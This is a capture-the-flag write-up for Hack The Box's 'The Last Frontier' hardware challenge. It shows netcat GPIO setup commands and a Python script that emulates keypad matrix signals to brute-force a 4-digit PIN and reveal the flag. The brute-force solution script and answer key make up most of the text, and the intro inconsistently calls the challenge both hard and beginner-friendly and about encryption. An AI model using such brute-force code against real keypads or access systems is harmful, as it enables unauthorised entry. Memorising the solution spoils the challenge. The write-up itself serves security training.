HackTheBox The Last Frontier Writeup
Explore the basics of cybersecurity in the The Last Frontier Challenge on Hack The Box. This hard-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/779
Description
You’ve navigated past the main defenses, but there’s one more hurdle: an air-gapped security keypad guarding the lab. We already tried up until the 5000 passcode but we did not manage to open it. We need a faster way to go through all the 4-digit passcodes. Luckily, we’ve exposed some traces on the device’s keypad. Since it’s air-gapped, you’ll need to manually manipulate these pins to mimic the correct keypress sequence. Understanding circuit behavior and exploiting potential vulnerabilities in the hardware is key. Carefully manipulate the pins to unlock the door without triggering any alarms. This is your final step to securing the patch for distribution across the city. To aid in your mission, we have created a remote command and control interface for our custom module connected to the security keypad’s traces. The schematic we’ve drafted based on the device’s keypad configuration should be enough to get you started. (To enter a passcode send # it at the end)
Exploitation
Connect with nc and Setup the gpio
1
2
3
4
5
6
#cmd> comm-module-id
#id> 35
#Module ID set to 35
#cmd> GPIO
#set> 1 0
#GPIO-1 set to: 0
Disconnect and After
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
import socket
import time
import sys
if len(sys.argv) < 2:
print(f"Usage: python {sys.argv[0]} <ip:port1,port2>")
sys.exit(1)
host, ports_str = sys.argv[1].split(':')
ports = [int(port) for port in ports_str.split(',')]
key_presses = '5254#'
current_key_to_send = 0
keymap = {
'1': ['E0', '0E'], '2': ['D0', '0E'], '3': ['B0', '0E'], 'A': ['70', '0E'],
'4': ['E0', '0D'], '5': ['D0', '0D'], '6': ['B0', '0D'], 'B': ['70', '0D'],
'7': ['E0', '0B'], '8': ['D0', '0B'], '9': ['B0', '0B'], 'C': ['70', '0B'],
'*': ['E0', '07'], '0': ['D0', '07'], '#': ['B0', '07'], 'D': ['70', '07']
}
def interact_with_nc(sock_nc):
sock_nc.sendall(b"system\n")
time.sleep(0.5)
response = sock_nc.recv(4096).decode('utf-8')
print("Received from NC server:", response)
return 'HTB{' in response
def simulate_keypad_read(command):
global current_key_to_send
if command == 'F0':
key = key_presses[current_key_to_send]
return keymap[key][0] + '\n'
elif command == '0F':
key = key_presses[current_key_to_send]
current_key_to_send += 1
return keymap[key][1] + '\n'
else:
return 'FF\n'
def run_client(server_host, server_port):
global key_presses, current_key_to_send
sock_nc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_nc.connect((host, ports[0]))
print("Connected to NC server.")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((server_host, server_port))
print("Connected to server")
for pin in range(5000, 5254):
key_presses = f"{pin:04d}#"
print(key_presses)
current_key_to_send = 0
while True:
data = sock.recv(1024).decode('utf-8').strip()
if not data:
print("Server closed the connection")
break
print(f"Received from server: {data}")
response = simulate_keypad_read(data)
if response:
sock.sendall(response.encode('utf-8'))
if len(key_presses) == current_key_to_send:
break
if data == 'quit':
print("Quit command received")
break
interact_with_nc(sock_nc)
if __name__ == "__main__":
run_client(host, ports[1])
Wait for the pin to be bruteforced and it will reveal the flag
Summary
The The Last Frontier Challenge on Hack The Box is a hard-level challenge that focuses on advanced hardware manipulation and network communication. Participants configure GPIO settings via command-line, utilize socket programming to automate network interactions, and conduct a brute-force attack to decode a PIN. This challenge effectively combines hardware control with practical cybersecurity techniques.